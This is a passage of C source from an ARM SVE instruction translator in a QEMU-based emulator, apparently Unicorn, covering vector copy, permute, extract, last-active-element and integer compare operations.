*/ static void do_cpy_m(DisasContext *s, int esz, int rd, int rn, int pg, TCGv_i64 val) { TCGContext *tcg_ctx = s->uc->tcg_ctx; typedef void gen_cpy(TCGContext *, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_i64, TCGv_i32); static gen_cpy * const fns[4] = { gen_helper_sve_cpy_m_b, gen_helper_sve_cpy_m_h, gen_helper_sve_cpy_m_s, gen_helper_sve_cpy_m_d, }; unsigned vsz = vec_full_reg_size(s); TCGv_i32 desc = tcg_const_i32(tcg_ctx, simd_desc(vsz, vsz, 0)); TCGv_ptr t_zd = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr t_zn = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr t_pg = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, t_zd, tcg_ctx->cpu_env, vec_full_reg_offset(s, rd)); tcg_gen_addi_ptr(tcg_ctx, t_zn, tcg_ctx->cpu_env, vec_full_reg_offset(s, rn)); tcg_gen_addi_ptr(tcg_ctx, t_pg, tcg_ctx->cpu_env, pred_full_reg_offset(s, pg)); fns[esz](tcg_ctx, t_zd, t_zn, t_pg, val, desc); tcg_temp_free_ptr(tcg_ctx, t_zd); tcg_temp_free_ptr(tcg_ctx, t_zn); tcg_temp_free_ptr(tcg_ctx, t_pg); tcg_temp_free_i32(tcg_ctx, desc); } static bool trans_FCPY(DisasContext *s, arg_FCPY *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->esz == 0) { return false; } if (sve_access_check(s)) { /* Decode the VFP immediate. */ uint64_t imm = vfp_expand_imm(a->esz, a->imm); TCGv_i64 t_imm = tcg_const_i64(tcg_ctx, imm); do_cpy_m(s, a->esz, a->rd, a->rn, a->pg, t_imm); tcg_temp_free_i64(tcg_ctx, t_imm); } return true; } static bool trans_CPY_m_i(DisasContext *s, arg_rpri_esz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->esz == 0 && extract32(s->insn, 13, 1)) { return false; } if (sve_access_check(s)) { TCGv_i64 t_imm = tcg_const_i64(tcg_ctx, a->imm); do_cpy_m(s, a->esz, a->rd, a->rn, a->pg, t_imm); tcg_temp_free_i64(tcg_ctx, t_imm); } return true; } static bool trans_CPY_z_i(DisasContext *s, arg_CPY_z_i *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_2i * const fns[4] = { gen_helper_sve_cpy_z_b, gen_helper_sve_cpy_z_h, gen_helper_sve_cpy_z_s, gen_helper_sve_cpy_z_d, }; if (a->esz == 0 && extract32(s->insn, 13, 1)) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); TCGv_i64 t_imm = tcg_const_i64(tcg_ctx, a->imm); tcg_gen_gvec_2i_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), pred_full_reg_offset(s, a->pg), t_imm, vsz, vsz, 0, fns[a->esz]); tcg_temp_free_i64(tcg_ctx, t_imm); } return true; } /* *** SVE Permute Extract Group */ static bool trans_EXT(DisasContext *s, arg_EXT *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!sve_access_check(s)) { return true; } unsigned vsz = vec_full_reg_size(s); unsigned n_ofs = a->imm >= vsz ? 0 : a->imm; unsigned n_siz = vsz - n_ofs; unsigned d = vec_full_reg_offset(s, a->rd); unsigned n = vec_full_reg_offset(s, a->rn); unsigned m = vec_full_reg_offset(s, a->rm); /* Use host vector move insns if we have appropriate sizes * and no unfortunate overlap. 
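 * EXT extracts vsz bytes from the concatenation Zn:Zm starting at byte
 * offset n_ofs, i.e. the tail of Zn followed by the head of Zm.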
*/ if (m != d && n_ofs == size_for_gvec(n_ofs) && n_siz == size_for_gvec(n_siz) && (d != n || n_siz <= n_ofs)) { tcg_gen_gvec_mov(tcg_ctx, 0, d, n + n_ofs, n_siz, n_siz); if (n_ofs != 0) { tcg_gen_gvec_mov(tcg_ctx, 0, d + n_siz, m, n_ofs, n_ofs); } } else { tcg_gen_gvec_3_ool(tcg_ctx, d, n, m, vsz, vsz, n_ofs, gen_helper_sve_ext); } return true; } /* *** SVE Permute - Unpredicated Group */ static bool trans_DUP_s(DisasContext *s, arg_DUP_s *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_dup_i64(tcg_ctx, a->esz, vec_full_reg_offset(s, a->rd), vsz, vsz, cpu_reg_sp(s, a->rn)); } return true; } static bool trans_DUP_x(DisasContext *s, arg_DUP_x *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if ((a->imm & 0x1f) == 0) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); unsigned dofs = vec_full_reg_offset(s, a->rd); unsigned esz, index; esz = ctz32(a->imm); index = a->imm >> (esz + 1); if ((index << esz) < vsz) { unsigned nofs = vec_reg_offset(s, a->rn, index, esz); tcg_gen_gvec_dup_mem(tcg_ctx, esz, dofs, nofs, vsz, vsz); } else { tcg_gen_gvec_dup64i(tcg_ctx, dofs, vsz, vsz, 0); } } return true; } static void do_insr_i64(DisasContext *s, arg_rrr_esz *a, TCGv_i64 val) { TCGContext *tcg_ctx = s->uc->tcg_ctx; typedef void gen_insr(TCGContext *, TCGv_ptr, TCGv_ptr, TCGv_i64, TCGv_i32); static gen_insr * const fns[4] = { gen_helper_sve_insr_b, gen_helper_sve_insr_h, gen_helper_sve_insr_s, gen_helper_sve_insr_d, }; unsigned vsz = vec_full_reg_size(s); TCGv_i32 desc = tcg_const_i32(tcg_ctx, simd_desc(vsz, vsz, 0)); TCGv_ptr t_zd = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr t_zn = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, t_zd, tcg_ctx->cpu_env, vec_full_reg_offset(s, a->rd)); tcg_gen_addi_ptr(tcg_ctx, t_zn, tcg_ctx->cpu_env, vec_full_reg_offset(s, a->rn)); fns[a->esz](tcg_ctx, t_zd, t_zn, val, desc); tcg_temp_free_ptr(tcg_ctx, t_zd); tcg_temp_free_ptr(tcg_ctx, t_zn); tcg_temp_free_i32(tcg_ctx, desc); } static bool trans_INSR_f(DisasContext *s, arg_rrr_esz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, t, tcg_ctx->cpu_env, vec_reg_offset(s, a->rm, 0, MO_64)); do_insr_i64(s, a, t); tcg_temp_free_i64(tcg_ctx, t); } return true; } static bool trans_INSR_r(DisasContext *s, arg_rrr_esz *a) { if (sve_access_check(s)) { do_insr_i64(s, a, cpu_reg(s, a->rm)); } return true; } static bool trans_REV_v(DisasContext *s, arg_rr_esz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_2 * const fns[4] = { gen_helper_sve_rev_b, gen_helper_sve_rev_h, gen_helper_sve_rev_s, gen_helper_sve_rev_d }; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_2_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vsz, vsz, 0, fns[a->esz]); } return true; } static bool trans_TBL(DisasContext *s, arg_rrr_esz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_3 * const fns[4] = { gen_helper_sve_tbl_b, gen_helper_sve_tbl_h, gen_helper_sve_tbl_s, gen_helper_sve_tbl_d }; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_3_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), vsz, vsz, 0, fns[a->esz]); } return true; } static bool trans_UNPK(DisasContext *s, arg_UNPK *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_2 * const fns[4][2] = { { NULL, NULL }, { gen_helper_sve_sunpk_h, 
gen_helper_sve_uunpk_h }, { gen_helper_sve_sunpk_s, gen_helper_sve_uunpk_s }, { gen_helper_sve_sunpk_d, gen_helper_sve_uunpk_d }, }; if (a->esz == 0) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_2_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn) + (a->h ? vsz / 2 : 0), vsz, vsz, 0, fns[a->esz][a->u]); } return true; } /* *** SVE Permute - Predicates Group */ static bool do_perm_pred3(DisasContext *s, arg_rrr_esz *a, bool high_odd, gen_helper_gvec_3 *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!sve_access_check(s)) { return true; } unsigned vsz = pred_full_reg_size(s); /* Predicate sizes may be smaller and cannot use simd_desc. We cannot round up, as we do elsewhere, because we need the exact size for ZIP2 and REV. We retain the style for the other helpers for consistency. */ TCGv_ptr t_d = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr t_n = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr t_m = tcg_temp_new_ptr(tcg_ctx); TCGv_i32 t_desc; int desc; desc = vsz - 2; desc = deposit32(desc, SIMD_DATA_SHIFT, 2, a->esz); desc = deposit32(desc, SIMD_DATA_SHIFT + 2, 2, high_odd); tcg_gen_addi_ptr(tcg_ctx, t_d, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rd)); tcg_gen_addi_ptr(tcg_ctx, t_n, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rn)); tcg_gen_addi_ptr(tcg_ctx, t_m, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rm)); t_desc = tcg_const_i32(tcg_ctx, desc); fn(tcg_ctx, t_d, t_n, t_m, t_desc); tcg_temp_free_ptr(tcg_ctx, t_d); tcg_temp_free_ptr(tcg_ctx, t_n); tcg_temp_free_ptr(tcg_ctx, t_m); tcg_temp_free_i32(tcg_ctx, t_desc); return true; } static bool do_perm_pred2(DisasContext *s, arg_rr_esz *a, bool high_odd, gen_helper_gvec_2 *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!sve_access_check(s)) { return true; } unsigned vsz = pred_full_reg_size(s); TCGv_ptr t_d = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr t_n = tcg_temp_new_ptr(tcg_ctx); TCGv_i32 t_desc; int desc; tcg_gen_addi_ptr(tcg_ctx, t_d, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rd)); tcg_gen_addi_ptr(tcg_ctx, t_n, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rn)); /* Predicate sizes may be smaller and cannot use simd_desc. We cannot round up, as we do elsewhere, because we need the exact size for ZIP2 and REV. We retain the style for the other helpers for consistency. 
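 * As in do_perm_pred3 above, the descriptor packs the exact predicate
 * size in bytes, minus 2, together with the element size and the
 * high/odd flag.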
*/ desc = vsz - 2; desc = deposit32(desc, SIMD_DATA_SHIFT, 2, a->esz); desc = deposit32(desc, SIMD_DATA_SHIFT + 2, 2, high_odd); t_desc = tcg_const_i32(tcg_ctx, desc); fn(tcg_ctx, t_d, t_n, t_desc); tcg_temp_free_i32(tcg_ctx, t_desc); tcg_temp_free_ptr(tcg_ctx, t_d); tcg_temp_free_ptr(tcg_ctx, t_n); return true; } static bool trans_ZIP1_p(DisasContext *s, arg_rrr_esz *a) { return do_perm_pred3(s, a, 0, gen_helper_sve_zip_p); } static bool trans_ZIP2_p(DisasContext *s, arg_rrr_esz *a) { return do_perm_pred3(s, a, 1, gen_helper_sve_zip_p); } static bool trans_UZP1_p(DisasContext *s, arg_rrr_esz *a) { return do_perm_pred3(s, a, 0, gen_helper_sve_uzp_p); } static bool trans_UZP2_p(DisasContext *s, arg_rrr_esz *a) { return do_perm_pred3(s, a, 1, gen_helper_sve_uzp_p); } static bool trans_TRN1_p(DisasContext *s, arg_rrr_esz *a) { return do_perm_pred3(s, a, 0, gen_helper_sve_trn_p); } static bool trans_TRN2_p(DisasContext *s, arg_rrr_esz *a) { return do_perm_pred3(s, a, 1, gen_helper_sve_trn_p); } static bool trans_REV_p(DisasContext *s, arg_rr_esz *a) { return do_perm_pred2(s, a, 0, gen_helper_sve_rev_p); } static bool trans_PUNPKLO(DisasContext *s, arg_PUNPKLO *a) { return do_perm_pred2(s, a, 0, gen_helper_sve_punpk_p); } static bool trans_PUNPKHI(DisasContext *s, arg_PUNPKHI *a) { return do_perm_pred2(s, a, 1, gen_helper_sve_punpk_p); } /* *** SVE Permute - Interleaving Group */ static bool do_zip(DisasContext *s, arg_rrr_esz *a, bool high) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_3 * const fns[4] = { gen_helper_sve_zip_b, gen_helper_sve_zip_h, gen_helper_sve_zip_s, gen_helper_sve_zip_d, }; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); unsigned high_ofs = high ? vsz / 2 : 0; tcg_gen_gvec_3_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn) + high_ofs, vec_full_reg_offset(s, a->rm) + high_ofs, vsz, vsz, 0, fns[a->esz]); } return true; } static bool do_zzz_data_ool(DisasContext *s, arg_rrr_esz *a, int data, gen_helper_gvec_3 *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_3_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), vsz, vsz, data, fn); } return true; } static bool trans_ZIP1_z(DisasContext *s, arg_rrr_esz *a) { return do_zip(s, a, false); } static bool trans_ZIP2_z(DisasContext *s, arg_rrr_esz *a) { return do_zip(s, a, true); } static gen_helper_gvec_3 * const uzp_fns[4] = { gen_helper_sve_uzp_b, gen_helper_sve_uzp_h, gen_helper_sve_uzp_s, gen_helper_sve_uzp_d, }; static bool trans_UZP1_z(DisasContext *s, arg_rrr_esz *a) { return do_zzz_data_ool(s, a, 0, uzp_fns[a->esz]); } static bool trans_UZP2_z(DisasContext *s, arg_rrr_esz *a) { return do_zzz_data_ool(s, a, 1 << a->esz, uzp_fns[a->esz]); } static gen_helper_gvec_3 * const trn_fns[4] = { gen_helper_sve_trn_b, gen_helper_sve_trn_h, gen_helper_sve_trn_s, gen_helper_sve_trn_d, }; static bool trans_TRN1_z(DisasContext *s, arg_rrr_esz *a) { return do_zzz_data_ool(s, a, 0, trn_fns[a->esz]); } static bool trans_TRN2_z(DisasContext *s, arg_rrr_esz *a) { return do_zzz_data_ool(s, a, 1 << a->esz, trn_fns[a->esz]); } /* *** SVE Permute Vector - Predicated Group */ static bool trans_COMPACT(DisasContext *s, arg_rpr_esz *a) { static gen_helper_gvec_3 * const fns[4] = { NULL, NULL, gen_helper_sve_compact_s, gen_helper_sve_compact_d }; return do_zpz_ool(s, a, fns[a->esz]); } /* Call the helper that computes the ARM LastActiveElement pseudocode * function, 
scaled by the element size. This includes the not found * indication; e.g. not found for esz=3 is -8. */ static void find_last_active(DisasContext *s, TCGv_i32 ret, int esz, int pg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Predicate sizes may be smaller and cannot use simd_desc. We cannot * round up, as we do elsewhere, because we need the exact size. */ TCGv_ptr t_p = tcg_temp_new_ptr(tcg_ctx); TCGv_i32 t_desc; unsigned vsz = pred_full_reg_size(s); unsigned desc; desc = vsz - 2; desc = deposit32(desc, SIMD_DATA_SHIFT, 2, esz); tcg_gen_addi_ptr(tcg_ctx, t_p, tcg_ctx->cpu_env, pred_full_reg_offset(s, pg)); t_desc = tcg_const_i32(tcg_ctx, desc); gen_helper_sve_last_active_element(tcg_ctx, ret, t_p, t_desc); tcg_temp_free_i32(tcg_ctx, t_desc); tcg_temp_free_ptr(tcg_ctx, t_p); } /* Increment LAST to the offset of the next element in the vector, * wrapping around to 0. */ static void incr_last_active(DisasContext *s, TCGv_i32 last, int esz) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned vsz = vec_full_reg_size(s); tcg_gen_addi_i32(tcg_ctx, last, last, 1 << esz); if (is_power_of_2(vsz)) { tcg_gen_andi_i32(tcg_ctx, last, last, vsz - 1); } else { TCGv_i32 max = tcg_const_i32(tcg_ctx, vsz); TCGv_i32 zero = tcg_const_i32(tcg_ctx, 0); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_GEU, last, last, max, zero, last); tcg_temp_free_i32(tcg_ctx, max); tcg_temp_free_i32(tcg_ctx, zero); } } /* If LAST < 0, set LAST to the offset of the last element in the vector. */ static void wrap_last_active(DisasContext *s, TCGv_i32 last, int esz) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned vsz = vec_full_reg_size(s); if (is_power_of_2(vsz)) { tcg_gen_andi_i32(tcg_ctx, last, last, vsz - 1); } else { TCGv_i32 max = tcg_const_i32(tcg_ctx, vsz - (1 << esz)); TCGv_i32 zero = tcg_const_i32(tcg_ctx, 0); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LT, last, last, zero, max, last); tcg_temp_free_i32(tcg_ctx, max); tcg_temp_free_i32(tcg_ctx, zero); } } /* Load an unsigned element of ESZ from BASE+OFS. */ static TCGv_i64 load_esz(TCGContext *tcg_ctx, TCGv_ptr base, int ofs, int esz) { TCGv_i64 r = tcg_temp_new_i64(tcg_ctx); switch (esz) { case 0: tcg_gen_ld8u_i64(tcg_ctx, r, base, ofs); break; case 1: tcg_gen_ld16u_i64(tcg_ctx, r, base, ofs); break; case 2: tcg_gen_ld32u_i64(tcg_ctx, r, base, ofs); break; case 3: tcg_gen_ld_i64(tcg_ctx, r, base, ofs); break; default: g_assert_not_reached(); } return r; } /* Load an unsigned element of ESZ from RM[LAST]. */ static TCGv_i64 load_last_active(DisasContext *s, TCGv_i32 last, int rm, int esz) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr p = tcg_temp_new_ptr(tcg_ctx); TCGv_i64 r; /* Convert offset into vector into offset into ENV. * The final adjustment for the vector register base * is added via constant offset to the load. */ #ifdef HOST_WORDS_BIGENDIAN /* Adjust for element ordering. See vec_reg_offset. */ if (esz < 3) { tcg_gen_xori_i32(tcg_ctx, last, last, 8 - (1 << esz)); } #endif tcg_gen_ext_i32_ptr(tcg_ctx, p, last); tcg_gen_add_ptr(tcg_ctx, p, p, tcg_ctx->cpu_env); r = load_esz(tcg_ctx, p, vec_full_reg_offset(s, rm), esz); tcg_temp_free_ptr(tcg_ctx, p); return r; } /* Compute CLAST for a Zreg. 
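 * CLASTB broadcasts the last active element of Zm across Zd; CLASTA
 * broadcasts the element following it. If no element is active, Zd is
 * taken from Zn instead.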
*/ static bool do_clast_vector(DisasContext *s, arg_rprr_esz *a, bool before) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 last; TCGLabel *over; TCGv_i64 ele; unsigned vsz, esz = a->esz; if (!sve_access_check(s)) { return true; } last = tcg_temp_local_new_i32(tcg_ctx); over = gen_new_label(tcg_ctx); find_last_active(s, last, esz, a->pg); /* There is of course no movcond for a 2048-bit vector, * so we must branch over the actual store. */ tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_LT, last, 0, over); if (!before) { incr_last_active(s, last, esz); } ele = load_last_active(s, last, a->rm, esz); tcg_temp_free_i32(tcg_ctx, last); vsz = vec_full_reg_size(s); tcg_gen_gvec_dup_i64(tcg_ctx, esz, vec_full_reg_offset(s, a->rd), vsz, vsz, ele); tcg_temp_free_i64(tcg_ctx, ele); /* If this insn used MOVPRFX, we may need a second move. */ if (a->rd != a->rn) { TCGLabel *done = gen_new_label(tcg_ctx); tcg_gen_br(tcg_ctx, done); gen_set_label(tcg_ctx, over); do_mov_z(s, a->rd, a->rn); gen_set_label(tcg_ctx, done); } else { gen_set_label(tcg_ctx, over); } return true; } static bool trans_CLASTA_z(DisasContext *s, arg_rprr_esz *a) { return do_clast_vector(s, a, false); } static bool trans_CLASTB_z(DisasContext *s, arg_rprr_esz *a) { return do_clast_vector(s, a, true); } /* Compute CLAST for a scalar. */ static void do_clast_scalar(DisasContext *s, int esz, int pg, int rm, bool before, TCGv_i64 reg_val) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 last = tcg_temp_new_i32(tcg_ctx); TCGv_i64 ele, cmp, zero; find_last_active(s, last, esz, pg); /* Extend the original value of last prior to incrementing. */ cmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_i32_i64(tcg_ctx, cmp, last); if (!before) { incr_last_active(s, last, esz); } /* The conceit here is that while last < 0 indicates not found, after * adjusting for cpu_env->vfp.zregs[rm], it is still a valid address * from which we can load garbage. We then discard the garbage with * a conditional move. */ ele = load_last_active(s, last, rm, esz); tcg_temp_free_i32(tcg_ctx, last); zero = tcg_const_i64(tcg_ctx, 0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_GE, reg_val, cmp, zero, ele, reg_val); tcg_temp_free_i64(tcg_ctx, zero); tcg_temp_free_i64(tcg_ctx, cmp); tcg_temp_free_i64(tcg_ctx, ele); } /* Compute CLAST for a Vreg. */ static bool do_clast_fp(DisasContext *s, arg_rpr_esz *a, bool before) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { int esz = a->esz; int ofs = vec_reg_offset(s, a->rd, 0, esz); TCGv_i64 reg = load_esz(tcg_ctx, tcg_ctx->cpu_env, ofs, esz); do_clast_scalar(s, esz, a->pg, a->rn, before, reg); write_fp_dreg(s, a->rd, reg); tcg_temp_free_i64(tcg_ctx, reg); } return true; } static bool trans_CLASTA_v(DisasContext *s, arg_rpr_esz *a) { return do_clast_fp(s, a, false); } static bool trans_CLASTB_v(DisasContext *s, arg_rpr_esz *a) { return do_clast_fp(s, a, true); } /* Compute CLAST for a Xreg. 
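 * The general register is zero-extended to the element size first, so the
 * movcond in do_clast_scalar yields a correctly extended result when no
 * element is active.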
*/ static bool do_clast_general(DisasContext *s, arg_rpr_esz *a, bool before) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 reg; if (!sve_access_check(s)) { return true; } reg = cpu_reg(s, a->rd); switch (a->esz) { case 0: tcg_gen_ext8u_i64(tcg_ctx, reg, reg); break; case 1: tcg_gen_ext16u_i64(tcg_ctx, reg, reg); break; case 2: tcg_gen_ext32u_i64(tcg_ctx, reg, reg); break; case 3: break; default: g_assert_not_reached(); } do_clast_scalar(s, a->esz, a->pg, a->rn, before, reg); return true; } static bool trans_CLASTA_r(DisasContext *s, arg_rpr_esz *a) { return do_clast_general(s, a, false); } static bool trans_CLASTB_r(DisasContext *s, arg_rpr_esz *a) { return do_clast_general(s, a, true); } /* Compute LAST for a scalar. */ static TCGv_i64 do_last_scalar(DisasContext *s, int esz, int pg, int rm, bool before) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 last = tcg_temp_new_i32(tcg_ctx); TCGv_i64 ret; find_last_active(s, last, esz, pg); if (before) { wrap_last_active(s, last, esz); } else { incr_last_active(s, last, esz); } ret = load_last_active(s, last, rm, esz); tcg_temp_free_i32(tcg_ctx, last); return ret; } /* Compute LAST for a Vreg. */ static bool do_last_fp(DisasContext *s, arg_rpr_esz *a, bool before) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { TCGv_i64 val = do_last_scalar(s, a->esz, a->pg, a->rn, before); write_fp_dreg(s, a->rd, val); tcg_temp_free_i64(tcg_ctx, val); } return true; } static bool trans_LASTA_v(DisasContext *s, arg_rpr_esz *a) { return do_last_fp(s, a, false); } static bool trans_LASTB_v(DisasContext *s, arg_rpr_esz *a) { return do_last_fp(s, a, true); } /* Compute LAST for a Xreg. */ static bool do_last_general(DisasContext *s, arg_rpr_esz *a, bool before) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { TCGv_i64 val = do_last_scalar(s, a->esz, a->pg, a->rn, before); tcg_gen_mov_i64(tcg_ctx, cpu_reg(s, a->rd), val); tcg_temp_free_i64(tcg_ctx, val); } return true; } static bool trans_LASTA_r(DisasContext *s, arg_rpr_esz *a) { return do_last_general(s, a, false); } static bool trans_LASTB_r(DisasContext *s, arg_rpr_esz *a) { return do_last_general(s, a, true); } static bool trans_CPY_m_r(DisasContext *s, arg_rpr_esz *a) { if (sve_access_check(s)) { do_cpy_m(s, a->esz, a->rd, a->rd, a->pg, cpu_reg_sp(s, a->rn)); } return true; } static bool trans_CPY_m_v(DisasContext *s, arg_rpr_esz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { int ofs = vec_reg_offset(s, a->rn, 0, a->esz); TCGv_i64 t = load_esz(tcg_ctx, tcg_ctx->cpu_env, ofs, a->esz); do_cpy_m(s, a->esz, a->rd, a->rd, a->pg, t); tcg_temp_free_i64(tcg_ctx, t); } return true; } static bool trans_REVB(DisasContext *s, arg_rpr_esz *a) { static gen_helper_gvec_3 * const fns[4] = { NULL, gen_helper_sve_revb_h, gen_helper_sve_revb_s, gen_helper_sve_revb_d, }; return do_zpz_ool(s, a, fns[a->esz]); } static bool trans_REVH(DisasContext *s, arg_rpr_esz *a) { static gen_helper_gvec_3 * const fns[4] = { NULL, NULL, gen_helper_sve_revh_s, gen_helper_sve_revh_d, }; return do_zpz_ool(s, a, fns[a->esz]); } static bool trans_REVW(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ool(s, a, a->esz == 3 ? 
gen_helper_sve_revw_d : NULL); } static bool trans_RBIT(DisasContext *s, arg_rpr_esz *a) { static gen_helper_gvec_3 * const fns[4] = { gen_helper_sve_rbit_b, gen_helper_sve_rbit_h, gen_helper_sve_rbit_s, gen_helper_sve_rbit_d, }; return do_zpz_ool(s, a, fns[a->esz]); } static bool trans_SPLICE(DisasContext *s, arg_rprr_esz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_4_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), pred_full_reg_offset(s, a->pg), vsz, vsz, a->esz, gen_helper_sve_splice); } return true; } /* *** SVE Integer Compare - Vectors Group */ static bool do_ppzz_flags(DisasContext *s, arg_rprr_esz *a, gen_helper_gvec_flags_4 *gen_fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr pd, zn, zm, pg; unsigned vsz; TCGv_i32 t; if (gen_fn == NULL) { return false; } if (!sve_access_check(s)) { return true; } vsz = vec_full_reg_size(s); t = tcg_const_i32(tcg_ctx, simd_desc(vsz, vsz, 0)); pd = tcg_temp_new_ptr(tcg_ctx); zn = tcg_temp_new_ptr(tcg_ctx); zm = tcg_temp_new_ptr(tcg_ctx); pg = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, pd, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rd)); tcg_gen_addi_ptr(tcg_ctx, zn, tcg_ctx->cpu_env, vec_full_reg_offset(s, a->rn)); tcg_gen_addi_ptr(tcg_ctx, zm, tcg_ctx->cpu_env, vec_full_reg_offset(s, a->rm)); tcg_gen_addi_ptr(tcg_ctx, pg, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->pg)); gen_fn(tcg_ctx, t, pd, zn, zm, pg, t); tcg_temp_free_ptr(tcg_ctx, pd); tcg_temp_free_ptr(tcg_ctx, zn); tcg_temp_free_ptr(tcg_ctx, zm); tcg_temp_free_ptr(tcg_ctx, pg); do_pred_flags(tcg_ctx, t); tcg_temp_free_i32(tcg_ctx, t); return true; } #define DO_PPZZ(NAME, name) \ static bool trans_##NAME##_ppzz(DisasContext *s, arg_rprr_esz *a) \ { \ static gen_helper_gvec_flags_4 * const fns[4] = { \ gen_helper_sve_##name##_ppzz_b, gen_helper_sve_##name##_ppzz_h, \ gen_helper_sve_##name##_ppzz_s, gen_helper_sve_##name##_ppzz_d, \ }; \ return do_ppzz_flags(s, a, fns[a->esz]); \ } DO_PPZZ(CMPEQ, cmpeq) DO_PPZZ(CMPNE, cmpne) DO_PPZZ(CMPGT, cmpgt) DO_PPZZ(CMPGE, cmpge) DO_PPZZ(CMPHI, cmphi) DO_PPZZ(CMPHS, cmphs) #undef DO_PPZZ #define DO_PPZW(NAME, name) \ static bool trans_##NAME##_ppzw(DisasContext *s, arg_rprr_esz *a) \ { \ static gen_helper_gvec_flags_4 * const fns[4] = { \ gen_helper_sve_##name##_ppzw_b, gen_helper_sve_##name##_ppzw_h, \ gen_helper_sve_##name##_ppzw_s, NULL \ }; \ return do_ppzz_flags(s, a, fns[a->esz]); \ } DO_PPZW(CMPEQ, cmpeq) DO_PPZW(CMPNE, cmpne) DO_PPZW(CMPGT, cmpgt) DO_PPZW(CMPGE, cmpge) DO_PPZW(CMPHI, cmphi) DO_PPZW(CMPHS, cmphs) DO_PPZW(CMPLT, cmplt) DO_PPZW(CMPLE, cmple) DO_PPZW(CMPLO, cmplo) DO_PPZW(CMPLS, cmpls) #undef DO_PPZW /* *** SVE Integer Compare - Immediate Groups */ static bool do_ppzi_flags(DisasContext *s, arg_rpri_esz *a, gen_helper_gvec_flags_3 *gen_fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr pd, zn, pg; unsigned vsz; TCGv_i32 t; if (gen_fn == NULL) { return false; } if (!sve_access_check(s)) { return true; } vsz = vec_full_reg_size(s); t = tcg_const_i32(tcg_ctx, simd_desc(vsz, vsz, a->imm)); pd = tcg_temp_new_ptr(tcg_ctx); zn = tcg_temp_new_ptr(tcg_ctx); pg = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, 